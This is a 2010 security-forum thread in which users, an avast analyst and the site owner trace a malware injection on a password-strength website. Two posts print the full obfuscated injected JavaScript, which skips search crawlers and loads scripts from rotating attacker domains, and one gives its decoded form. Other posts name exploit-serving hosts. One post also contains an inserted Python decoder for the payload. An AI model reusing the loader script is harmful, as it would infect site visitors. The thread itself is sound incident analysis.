Analysis of password-strength page at unwrongest website (split from password thread)

Discussion in 'malware problems & news' started by Sully, Jul 21, 2010.

Thread Status:
Not open for further replies.
  1. Page42

    Page42 Registered Member

    Joined:
    Jun 18, 2007
    Posts:
    6,941
    Location:
    USA
    Have you guys looked at the Anubis analysis I posted?
    That's a lot of info to digest... a 29 page PDF file.
    I can't make sense out of most of it, but the summary definitely states that the executable modifies and destructs files which are not temporary, and it reads and modifies registry values. It also creates and monitors registry keys.
     
  2. Page42

    Page42 Registered Member

    Joined:
    Jun 18, 2007
    Posts:
    6,941
    Location:
    USA
    The avast! web shield is what is acting on these threats, JR.
    According to avast!, "The Web Shield scrutinizes all your web browsing activities, and eliminates any online threats even before your web browser sees them". The action taken is abort connection, so nothing is being downloaded.

    I think I'll reduce the heuristics and see if the detection is impacted.

    Edit in: I reduced the heuristics from high to normal and tried on 2 different computers (after clearing cache, cookies, temp files) and I still got (new) detections...

    gold . edisonsnightclub . com / data / mootools . js
    &
    snow . karengren . com / data / mootools . js
     
    Last edited: Jul 25, 2010
  3. LowWaterMark

    LowWaterMark Administrator

    Joined:
    Aug 10, 2002
    Posts:
    18,280
    Location:
    New England
    Yes, I looked at both reports and they really don't clarify things enough. Have you noticed that the reports are identical for both submissions? A JS file analysis versus a website HTML analysis, both have exactly the same report. It calls it an executable. "The executable modifies..." "The executable reads..." and both are exactly the same. Well, neither are an executable. One is a script file and one is an HTML page, which could never be called an executable no matter the circumstances.

    Frankly, this is the first time I have to question if Anubis is actually analyzing the target or if it is giving a standard answer. We woefully need more facts than this to make a determination here.
     
  4. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Thanks, but I wouldn't want to claim to be able to find everything. Exploits are just too complex/sophisticated these days. I'm just puzzled why nothing seems to happen at that site.

    I don't see evidence of an executable...

    Also, I'm curious why TrendMicro and others haven't picked up on this exploit, which Avast flagged months ago.

    I submitted the URL to jsunpack.jeek.org/ for that .js file:

    http://jsunpack.jeek.org/dec/go?report=34ec7e7d65fa483978039563e66272ac08ab2329

    On the other hand,

    http://sucuri.net/malware/entry/MW:JS:221
    And the plot thickens... (I can't remember who first said that)

    ----
    rich
     
  5. JRViejo

    JRViejo Super Moderator

    Joined:
    Jul 9, 2008
    Posts:
    97,905
    Location:
    U.S.A.
  6. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    20,590
    Wow, I seem to have stirred up a hornets' nest.

    It was interesting to see some of the things it's supposed to do.

    I am going to try a test tomorrow, to see something, but the funny part for me is, if it is malicious, it totally validates my security.

    No, I don't have Avast to alert me to something that might happen or might not happen, but looking at the things it does, it wouldn't matter, because Sandboxie would block them all from harming me.

    What I want to try and test is if indeed something was going on.

    Pete
     
  7. Page42

    Page42 Registered Member

    Joined:
    Jun 18, 2007
    Posts:
    6,941
    Location:
    USA
    FYI, here are the objects that avast! has detected on the unwrongest site...

    plum . karenegren . com / data / mootools . js
    aqua . karenegren . com / data / mootools . js
    snow . karenegren . com / data / mootools . js
    gray . edisonsnightclub . com / data / mootools . js
    white . edisonsnightclub . com / data / mootools . js
    gold . edisonsnightclub . com / data / mootools . js
    lime . edisonsnightclub . com / data / mootools . js
    brown . emapis . org / data / mootools . js
     
  8. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    20,590
    Okay, ran my test.

    What I did was completely uninstall Malware Defender, so everything it knew about the machine was gone.

    Then I reinstalled MD, and left learning mode on only for a reboot. Then turned off MD learning mode. I had all of MD's protections on.

    It took me 7 pop-ups just to get IE open unsandboxed. I then went to the unwrongest website and tried several passwords. Not a single peep out of MD. Machine was fine through a reboot.

    So what does it tell me? Well, for one thing, it pays to be alert no matter what you think about a site. This site did nothing to me, but was it because it wasn't infected, or because I was just in the wrong location? Don't know.

    On the other hand, Avast reports all kinds of stuff. Now if Avast, or any AV for that matter, never had a false positive, I'd really be concerned. But since they do, I can't be any more confident the site is really infected because Avast reports it so, than I can be 100% sure it isn't because it didn't affect me.

    That's why for me, I prefer not to use the AV, but use Sandboxie to protect the system, and MD to alert me that something is going on, that I might need to check.

    Pete
     
  9. jsejtko

    jsejtko Virus Analyst

    Joined:
    Jul 26, 2010
    Posts:
    2
    Hello all,

    Here is some information about this detection. First, this is not a false positive. All the files (mootools.js) are currently down on the servers, but I found one sample that had been sent through the avast UI as a false positive.

    You may see the content of the detected file in the attached image (snow_karenegren_com_data_mootools_js.png) - not any version of mootools, is it? This is just another step in the IllRedir (some call it Pegel) evolution. If you check the underlined text on the first and second lines you will see an obfuscated URL. This URL is shown in the second image (flow) as the URL used in a dynamically created iframe.

    Please do not try to access the second URL, as it is still active and still redirects to a malware IP containing various exploits.

    Code:
    PDF exploit on the target IP (vt report) http://www.virustotal.com/analisis/16af2b0f548513c98fe738a244933c947a26260706d1ad9b3ca5a65e33b9e99e-1280158545
    IllRedir infection (vt report) http://www.virustotal.com/analisis/67e452984612a84a47a321e515ac677551ed81b9ba6e85e1dcd1ecf60d6486f6-1280158560
    
    Best Regards
    Jirka Sejtko
     
  10. Page42

    Page42 Registered Member

    Joined:
    Jun 18, 2007
    Posts:
    6,941
    Location:
    USA
    Hello Jirka
    Are you a virus analyst employed by avast?
    Also, you noted that, "All the files (mootools.js) are currently down on the servers". That must be why, when I go to the unwrongest site today, there is now no detection alert from avast.
    Thanks for your input.

    Edit in: I can answer my own question... I consulted my avast email support files and I see that Jirka Sejtko is a virus analyst for Alwil. :)
     
    Last edited: Jul 26, 2010
  11. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Thanks for confirming.

    Yesterday, I submitted to JSUNPACK one of those .js files that appeared elsewhere, and it showed benign, evidently because the redirected ideacore.com URL showed benign:

    Code:
    
    All Malicious or Suspicious Elements of Submission
    None 
    aqua . karenegren . com / data / mootools . js benign
    
    [nothing detected] aqua . karenegren . com / data / mootools . js
      
         info: [decodingLevel=0] found JavaScript
         info: [setAttribute src] URL=i . ideacore . com / in . cgi ? 2
    
    ...
    
    
    i . ideacore . com / in . cgi ? 2 benign
    [nothing detected] (setAttribute src) i . ideacore . com / in . cgi ? 2
         status: (referer= aqua . karenegren . com / data / mootools . js)
    
    
    When I tried that URL yesterday, nothing happened. After seeing your post, I tried it again and also the one you cited -- both are happily working to serve up an exploit to IE6, but nothing to Opera on my system:

    mootools-exploit.gif

    This is a good lesson when using analysis tools, like JSUNPACK: that javascript appeared to be benign, but in fact would redirect to a malicious site.

    Another online tool is Wepawet, which has been fooled by obfuscated javascript in exploits.

    While I use those tools often, nonetheless, being a skeptic by nature, if I don't see the exploit in action, I have nothing to go on. Hence, my comments in previous posts here as to whether or not the password site is infected.

    In many ways, I think as Pete does:

    It seems wise to have something in place to protect the system in any case; then, you are covered, no matter the conflicting reports about a site!

    ----
    rich
     
  12. jsejtko

    jsejtko Virus Analyst

    Joined:
    Jul 26, 2010
    Posts:
    2
    Hello Page42 and others :)

    Yes, I am. As you have found from my email :).

    Well, this is the question. It seems to me like a layered attack using 4 layers:
    1.) the malware distribution layer (last IP with exploit pack)
    2.) ideacore - last redirection to 1.
    3.) karenegren - second redirection - to 2
    4.) hack/injection into the unwrongest site which redirects to 3.

    Layers 1, 2, 3 are probably operated by the bad guys (please correct me if I'm wrong). 2 and 3 might be hacks too, but these domains are quite new, previously unused. If this is right, then the bad guys may renew the content on demand anytime. The only way to break this attack (by the webmaster) is to find the hack on the 4th layer.

    The following link contains the 4th layer which was probably present on the unwrongest site (found it today, while searching for some more info about the domains).
    Code:
    http://pastebin.com/KqseJTAA
    Regards
     
  13. Page42

    Page42 Registered Member

    Joined:
    Jun 18, 2007
    Posts:
    6,941
    Location:
    USA
    Jirka
    Please check your PM.
     
  14. janjarfalk

    janjarfalk Registered Member

    Joined:
    Jul 27, 2010
    Posts:
    1
    Hello,

    My name is Jan Jarfalk and I'm the owner of Unwrongest. I got an email from 'Screeno' about this thread and the threat detection.

    Unwrongest isn't meant to be a malicious site but Avast detection was correct. There were two alien code snippets in the code.

    One in jquery-1.3.2.min.js
    Code:
    var st1 = 0;document.write(unescape('%3C%73%63%72%69%70%74%3E%76%61%72%20%64%63%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%20%76%61%72%20%63%6E%61%6D%65%20%3D%20%27%77%61%74%63%68%74%69%6D%65%27%3B%20%76%61%72%20%77%6E%20%3D%20%77%69%6E%64%6F%77%2E%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%3B%20%76%61%72%20%73%74%72%69%20%3D%20%2F%28%79%61%68%6F%6F%7C%73%65%61%72%63%68%7C%6D%73%6E%62%6F%74%7C%79%61%6E%64%65%78%7C%67%6F%6F%67%6C%65%62%6F%74%7C%62%69%6E%67%7C%61%73%6B%29%2F%69%3B%20%76%61%72%20%73%74%72%4F%53%20%3D%20%6E%61%76%69%67%61%74%6F%72%2E%61%70%70%56%65%72%73%69%6F%6E%3B%20%69%66%28%64%63%2E%69%6E%64%65%78%4F%66%28%63%6E%61%6D%65%29%3D%3D%2D%31%20%26%26%20%21%77%6E%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%6D%61%74%63%68%28%73%74%72%69%29%20%26%26%20%73%74%72%4F%53%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%27%77%69%6E%27%29%20%21%3D%20%2D%31%29%20%7B%20%76%61%72%20%64%6F%6D%73%20%3D%20%5B%27%65%64%69%73%6F%6E%73%6E%69%67%68%74%63%6C%75%62%2E%63%6F%6D%27%2C%27%65%6D%61%70%69%73%2E%6F%72%67%27%2C%27%69%64%65%61%63%6F%72%65%70%6F%72%74%61%6C%2E%63%6F%6D%27%2C%27%6B%61%72%65%6E%65%67%72%65%6E%2E%63%6F%6D%27%5D%3B%20%76%61%72%20%70%72%65%66%66%73%20%3D%20%5B%27%61%71%75%61%2E%27%2C%27%61%7A%75%72%65%2E%27%2C%27%62%6C%61%63%6B%2E%27%2C%27%62%6C%75%65%2E%27%2C%27%62%72%6F%77%6E%2E%27%2C%27%67%6F%6C%64%2E%27%2C%27%67%72%61%79%2E%27%2C%27%67%72%65%65%6E%2E%27%2C%27%6C%69%6D%65%2E%27%2C%27%6E%61%76%79%2E%27%2C%27%6F%6C%69%76%65%2E%27%2C%27%70%6C%75%6D%2E%27%2C%27%72%65%64%2E%27%2C%27%73%6E%6F%77%2E%27%2C%27%77%68%69%74%65%2E%27%2C%27%79%65%6C%6C%6F%77%2E%27%5D%3B%20%76%61%72%20%64%6F%6D%20%3D%20%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%64%6F%6D%73%2E%6C%65%6E%67%74%68%29%3B%20%76%61%72%20%70%72%65%66%20%3D%20%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%70%72%65%66%66%73%2E%6C%65%6E%67%74%68%29%3B%20%64%74%3D%6E%65%77%20%44%61%74%65%28%29%3B%64
%74%2E%73%65%74%54%69%6D%65%28%64%74%2E%67%65%74%54%69%6D%65%28%29%20%2B%20%37%2A%33%36%30%30%2A%33%36%30%30%29%3B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%63%6E%61%6D%65%2B%27%3D%27%2B%65%73%63%61%70%65%28%63%6E%61%6D%65%29%2B%27%3B%65%78%70%69%72%65%73%3D%27%2B%64%74%2E%74%6F%47%4D%54%53%74%72%69%6E%67%28%29%2B%27%3B%70%61%74%68%3D%2F%27%3B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%27%2B%70%72%65%66%66%73%5B%70%72%65%66%5D%2B%64%6F%6D%73%5B%64%6F%6D%5D%2B%27%2F%64%61%74%61%2F%6D%6F%6F%74%6F%6F%6C%73%2E%6A%73%22%3E%3C%5C%2F%73%63%72%69%70%74%3E%27%29%3B%20%7D%3B%3C%2F%73%63%72%69%70%74%3E'));var gr0=0;
    
    And another in footer.php (wordpress template file).
    Code:
    <?php eval(base64_decode( /* malscript */ ))?>
    
    It looked something like that. I have the complete source at home.

    I don't know how they got there... yet, but both, hopefully all, of them are now removed.

    Thanks again 'Screeno' for bringing this to my attention.
    And Thanks all of you who put an interest in my website.

    Update:
    Someone with the alias johnnyA has managed to create an admin account for himself.
    http://www.michaeljanzen.com/tag/sarkonerrgmail-com/
     
    Last edited: Jul 27, 2010
  15. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    20,590
    Hi Jan Jarfalk

    First, welcome to Wilders. Thanks for stopping by and clarifying this. I am the one who first mentioned your site, as I find it very useful. Thanks also for fixing the code.

    Also thanks to all who've participated in this thread. It's what is so great about Wilders.

    Pete
     
  16. Sadeghi85

    Sadeghi85 Registered Member

    Joined:
    Dec 20, 2009
    Posts:
    747
    It could be a case of hacking your database password rather than a WordPress security bug. I see both your and michaeljanzen's websites are hosted by MEDIA TEMPLE.
     
  17. Page42

    Page42 Registered Member

    Joined:
    Jun 18, 2007
    Posts:
    6,941
    Location:
    USA
    Hello Jan
    Glad you posted here regarding this matter.
    FYI, a malware analyzing service named Anubis is still finding problems on your site. (see report dated today) I have no way of knowing if their report is accurate... just wanted to give you a heads up. They have their contact address at the bottom of every page.
    Thanks for working to resolve the problem! :)
     
  18. Page42

    Page42 Registered Member

    Joined:
    Jun 18, 2007
    Posts:
    6,941
    Location:
    USA
    The Anubis report notes that the malware creates a directory here:

    C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer

    I am curious about that directory, as it appears on both of the computers on my home LAN, but with widely different creation dates (2002 & 2010). I went to the unwrongest site with both computers.
    I believe this directory is standard for IE8 in WinXP, SP3... but I'd like to know what others are thinking.
    Since avast flagged the malware and aborted connection to the site, and because I run my browser with limited user account restrictions via OA's RunSafer, I don't think I was impacted by visiting the unwrongest site while it was dishing up the exploit... but I would like to be sure. Any ideas or thoughts?

    edit:typo
     
    Last edited: Jul 29, 2010
  19. GTO_Jeff

    GTO_Jeff Registered Member

    Joined:
    Jul 29, 2010
    Posts:
    1
    OK all, I have to chime in here as I am also currently cleaning up another system that is also hosted at media-temple. One of my users hit this site from a training class and it served up some serious fake AV malware. I went searching and narrowed it down to a job bank site. When I contacted the webmaster, (believe it or not) they opened access up for me to "look around" (yes, we ARE having the discussion about reverse social engineering).

    I located 17 PHP pages with an obfuscated string:

    Code:
    >>>Begin<<<
    
    	<ads><script type="text/javascript">var st1 = 0; document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%76%61%72%20%61%3D%77%69%6E%64%6F%77%2E%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2C%62%3D%2F%28%79%61%68%6F%6F%7C%73%65%61%72%63%68%7C%6D%73%6E%62%6F%74%7C%79%61%6E%64%65%78%7C%67%6F%6F%67%6C%65%62%6F%74%7C%62%69%6E%67%7C%61%73%6B%29%2F%69%2C%63%3D%6E%61%76%69%67%61%74%6F%72%2E%61%70%70%56%65%72%73%69%6F%6E%3B%20%69%66%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%69%6E%64%65%78%4F%66%28%22%77%61%74%63%68%74%69%6D%65%22%29%3D%3D%2D%31%26%26%21%61%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%6D%61%74%63%68%28%62%29%26%26%63%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%77%69%6E%22%29%21%3D%2D%31%29%7B%76%61%72%20%64%3D%5B%22%65%64%69%73%6F%6E%73%6E%69%67%68%74%63%6C%75%62%2E%63%6F%6D%22%2C%22%67%61%69%6E%64%69%72%65%63%74%6F%72%79%2E%6F%72%67%22%2C%22%69%64%65%61%63%6F%72%65%70%6F%72%74%61%6C%2E%63%6F%6D%22%2C%22%6B%61%72%65%6E%65%67%72%65%6E%2E%63%6F%6D%22%5D%2C%65%3D%5B%22%61%71%75%61%2E%22%2C%22%61%7A%75%72%65%2E%22%2C%22%62%6C%61%63%6B%2E%22%2C%22%62%6C%75%65%2E%22%2C%22%62%72%6F%77%6E%2E%22%2C%22%63%68%6F%63%6F%6C%61%74%65%2E%22%2C%22%63%6F%72%61%6C%2E%22%2C%22%63%79%61%6E%2E%22%2C%22%64%61%72%6B%72%65%64%2E%22%2C%22%66%75%63%68%73%69%61%2E%22%2C%22%67%6F%6C%64%2E%22%2C%22%67%72%61%79%2E%22%2C%22%67%72%65%65%6E%2E%22%2C%22%69%6E%64%69%67%6F%2E%22%2C%22%69%76%6F%72%79%2E%22%2C%22%6B%68%61%6B%69%2E%22%2C%22%6C%69%6D%65%2E%22%2C%22%6D%61%67%65%6E%74%61%2E%22%2C%22%6D%61%72%6F%6F%6E%2E%22%2C%22%6E%61%76%79%2E%22%2C%22%6F%6C%69%76%65%2E%22%2C%22%6F%72%61%6E%67%65%2E%22%2C%22%70%69%6E%6B%2E%22%2C%22%70%6C%75%6D%2E%22%2C%22%70%75%72%70%6C%65%2E%22%2C%22%72%65%64%2E%22%2C%22%73%69%6C%76%65%72%2E%22%2C%22%73%6E%6F%77%2E%22%2C%22%76%69%6F%6C%65%74%2E%22%2C%22%77%68%69%74%65%2E%22%2C%22%79%65%6C%6C%6F%77%2E%22%5D%2C%66%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%
61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%20%64%2E%6C%65%6E%67%74%68%29%2C%67%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%65%2E%6C%65%6E%67%74%68%29%3B%64%74%3D%6E%65%77%20%44%61%74%65%3B%64%74%2E%73%65%74%54%69%6D%65%28%64%74%2E%67%65%74%54%69%6D%65%28%29%2B%39%30%37%32%45%34%29%3B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%22%77%61%74%63%68%74%69%6D%65%3D%22%2B%65%73%63%61%70%65%28%22%77%61%74%63%68%74%69%6D%65%22%29%2B%22%3B%65%78%70%69%72%65%73%3D%22%2B%64%74%2E%74%6F%47%4D%54%53%74%72%69%6E%67%28%29%2B%22%3B%70%61%74%68%3D%2F%22%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%27%2B%65%5B%67%5D%2B%64%5B%66%5D%2B%27%2F%64%61%74%61%2F%6D%6F%6F%74%6F%6F%6C%73%2E%6A%73%22%3E%3C%5C%2F%73%63%72%69%70%74%3E%27%29%7D%3B%3C%2F%73%63%72%69%70%74%3E'));var gr0=0;</script></ads>		
    
    <<<End>>>
    When I extracted the encoded string, this is what I got:

    Code:
    <<<Begin clear code>>>>
    
    	<ads><script type="text/javascript">var st1 = 0; document.write(unescape('<script type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("watchtime")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["edisonsnightclub.com","gaindirectory.org","ideacoreportal.com","karenegren.com"],e=["aqua.","azure.","black.","blue.","brown.","chocolate.","coral.","cyan.","darkred.","fuchsia.","gold.","gray.","green.","indigo.","ivory.","khaki.","lime.","magenta.","maroon.","navy.","olive.","orange.","pink.","plum.","purple.","red.","silver.","snow.","violet.","white.","yellow."],f=Math.floor(Math.random()* d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="watchtime="+escape("watchtime")+";expires="+dt.toGMTString()+";path=/";document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/data/mootools.js"><\/script>')};</script>'));var gr0=0;</script></ads>	
    
    
    <<<End Clear code>>>>

    You will see how each of the sites you are mentioning is selected. This is a very complex piece of code. It looks at the default search engine and modifies its response first to that. Then it appears to select a "color" based upon the browser that directs it to the .js file.

    Running a W3AF scan against this site revealed about 2 dozen CSRF vulnerabilities, a couple of XST (cross site tracing) vulnerabilities and one blind SQL injection. It also identified shared hosting due to the code above.

    I will post a more detailed analysis when I get through with it.
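    Jan's post 14 and GTO_Jeff's post 19 both show the same `document.write(unescape('%3C...'))` injection. The following Python is an added example, not code from this thread or from any of the posters: it decodes such a payload from a file's contents and pulls out the gate conditions and host lists a webmaster or responder would want. The fixture is a constructed, shortened version of the decoded snippet in post 19, and all regexes, function names and the result keys are my own assumptions.

```python
"""Decode document.write(unescape('%..')) injections of the kind shown in
this thread and report the cookie gate, crawler filter and loader hosts."""
import re
from urllib.parse import unquote

# document.write(unescape('...')) whose payload is entirely percent-encoded
WRITE_UNESCAPE = re.compile(r"document\.write\(unescape\('((?:%[0-9A-Fa-f]{2})+)'\)\)")
# a JavaScript array literal made only of string literals, e.g. ["aqua.","snow."]
STRING_ARRAY = re.compile(r'\[\s*(["\'][^"\']*["\'](?:\s*,\s*["\'][^"\']*["\'])*)\s*\]')
STRING_LIT = re.compile(r'["\']([^"\']*)["\']')
# src="http://'+PREFIX[i]+DOMAIN[j]+'/path"  (the loader URL template)
SRC_TEMPLATE = re.compile(r'src="http://\'\+\w+\[\w+\]\+\w+\[\w+\]\+\'([^"\']*)"')
# indexOf(<literal or variable>)==-1  (the "first visit only" cookie check)
COOKIE_GATE = re.compile(r'indexOf\((["\']?)(\w+)\1\)\s*==\s*-1')
# /(yahoo|search|...)/i  (user agents that are served the clean page)
BOT_FILTER = re.compile(r"/\(([\w|]+)\)/i")


def decode_injections(text):
    """Return the decoded payload of every document.write(unescape()) in text."""
    return [unquote(m.group(1)) for m in WRITE_UNESCAPE.finditer(text)]


def analyze_payload(js):
    """Extract gate conditions and host lists from one decoded payload."""
    domains, prefixes = [], []
    for arr in STRING_ARRAY.finditer(js):
        items = STRING_LIT.findall(arr.group(1))
        if items and all(i.endswith(".") for i in items):
            prefixes += items          # subdomain labels such as "aqua."
        elif items and all("." in i for i in items):
            domains += items           # second-level domains
    cookie = None
    m = COOKIE_GATE.search(js)
    if m:
        cookie = m.group(2)
        if not m.group(1):             # variable form: resolve its assignment
            v = re.search(r'var\s+%s\s*=\s*(["\'])(\w+)\1' % re.escape(cookie), js)
            cookie = v.group(2) if v else cookie
    bots = BOT_FILTER.search(js)
    src = SRC_TEMPLATE.search(js)
    return {
        "cookie_gate": cookie,
        "bot_filter": bots.group(1).split("|") if bots else [],
        "windows_only": 'indexOf("win")' in js or "indexOf('win')" in js,
        "domains": domains,
        "prefixes": prefixes,
        "loader_path": src.group(1) if src else None,
    }


def loader_urls(finding):
    """Every URL the loader can be fetched from (for blocklists and log searches)."""
    return sorted("http://%s%s%s" % (p, d, finding["loader_path"])
                  for p in finding["prefixes"] for d in finding["domains"])


def scan(text):
    """Decode and analyse all injections found in a file's contents."""
    return [analyze_payload(js) for js in decode_injections(text)]


# Constructed fixture modelled on the decoded snippet in post 19, with the
# host lists cut down to two domains and three prefixes from the thread.
_CLEAR = ('<script type="text/javascript">var a=window.navigator.userAgent,'
          'b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion;'
          ' if(document.cookie.indexOf("watchtime")==-1&&!a.toLowerCase().match(b)'
          '&&c.toLowerCase().indexOf("win")!=-1){var d=["edisonsnightclub.com",'
          '"karenegren.com"],e=["aqua.","snow.","gold."],f=Math.floor(Math.random()*'
          'd.length),g=Math.floor(Math.random()*e.length);dt=new Date;'
          'dt.setTime(dt.getTime()+9072E4);document.cookie="watchtime="+'
          'escape("watchtime")+";expires="+dt.toGMTString()+";path=/";'
          'document.write(\'<script type="text/javascript" src="http://\'+e[g]+d[f]'
          '+\'/data/mootools.js"><\\/script>\')};</script>')
_ENCODED = "".join("%%%02X" % b for b in _CLEAR.encode())   # every byte as %XX
SAMPLE_PHP = ('<?php get_footer(); ?>\n<ads><script type="text/javascript">var st1 = 0; '
              "document.write(unescape('" + _ENCODED + "'));var gr0=0;</script></ads>\n")

if __name__ == "__main__":
    for finding in scan(SAMPLE_PHP):
        print(finding)
        print("\n".join(loader_urls(finding)))
```

    The three gates explain why a crawler, a non-Windows browser or a second visit from the same browser sees a clean page, which is why a single analysis run can report the file as benign.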
     
  20. Page42

    Page42 Registered Member

    Joined:
    Jun 18, 2007
    Posts:
    6,941
    Location:
    USA
    MBAM Protection Module is doing an IP-block on 94.75.243.31 when I visit the unwrongest website...
     
  21. JRViejo

    JRViejo Super Moderator

    Joined:
    Jul 9, 2008
    Posts:
    97,905
    Location:
    U.S.A.
    Page42, IPVoid confirms that IP as Dangerous. Looks like Jan Jarfalk has more work to do. :ouch:
     
  22. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    I took another look at this site. Using Opera, nothing happens.

    Using my trusty unpatched IE6, I noticed briefly ipwn.ws in the status bar. Indeed, several exploits are served up from that domain, including a PDF exploit. The first malware file attempted to download as the Adobe splash screen appeared:

    unwrongest-pdf.gif

    and an IE6 exploit, either JAVA or MDAC; IE crashed, so I couldn't get a screen shot of the browser window, but the executable file attempted to download/run:


    unwrongest-rotExe.gif

    I cannot tell how ipwn.ws is being called - the code is very obfuscated. Perhaps GTO_Jeff or someone else with analysis tools will come back with further information.



    REFERENCES

    Domain matching ipwn.ws were found in our database.
    http://www.malwareurl.com/listing.php?domain=ipwn.ws

    ipwn.ws
    http://siteadvisor.es/sites/ipwn.ws/postid?p=4994919
    This is a summary of what was observed on ipwn.ws.
    http://wepawet.iseclab.org/domain.php?hash=aab8832e6833674355c6ca562e3b9882&type=js

    Analysis report for one of the PDF files
    http://wepawet.iseclab.org/view.php?hash=7ad3986fcf31700e1e9e73697f363f07&t=1280408815&type=js



    ----
    rich
     
  23. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Using Opera, I was able to see that the exploits are being loaded via an i-frame. Different i-frames come up on subsequent connections to the site. However, none of the exploits are triggered in Opera.

    This one is the URL for the Java exploit that I looked at in Post 36:

    unwrongest-opera1.gif

    This one serves up the exploits in my previous post.

    unwrongest-opera2.gif

    I think when using IE, both exploits are triggered, because I got the JAVA emblem along with the others.

    ----
    rich
     
  24. wat0114

    wat0114 Guest

    Hi Page42,

    That directory is the normal default in my neck of the woods on Win 7 x64. Browsing all throughout the site using FF 3.6.8 or IE8, I'm unable to notice one iota of infection occur. Nothing in AppLocker events to indicate anything nefarious. This is boring :( Is this site only hazardous to those running outdated software?
     
  25. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,978
    Visited -www.unwrongest.com/projects/password-strength- with unpatched IE6 and ALL scripting, ActiveX and iframe prompts allowed. No Java on here. Apart from seeing this, nothing happened?

    1.gif

    Went directly several times to find out what's there. -http://ipwn.ws:80/myothersoldier/redtapeaghast.php?unique=1- is now -http://ipwn.ws/myothersoldier/snazzyboss.php-; on there are all sorts of crud :eek:

    ie61.gif

    pdf1.gif

    mdac.gif

    ie62.gif

     